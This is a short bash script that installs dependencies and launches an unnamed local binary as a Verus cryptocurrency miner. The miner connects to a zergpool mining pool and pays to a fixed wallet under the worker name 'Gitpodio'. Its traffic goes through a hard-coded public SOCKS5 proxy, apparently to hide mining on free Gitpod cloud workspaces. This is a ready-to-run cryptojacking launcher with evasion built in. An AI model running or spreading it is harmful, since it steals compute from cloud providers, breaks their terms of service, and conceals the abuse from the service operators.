#!/bin/bash
sudo apt update
sudo apt install screen libjansson4 -y
sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
screen -dmS ls
A=verushash.na.mine.zergpool.com:3300
B=D67zfz3CwzGqVahUP2xYazJrgZxY2gp3cD
C=Gitpodio
D=socks5://72.221.232.155:4145

chmod u+x 2 && ./2 -a verus -o $A -u $B.$C -x $D  -p c=DGB --cpu-priority 5 --max-diff=390000
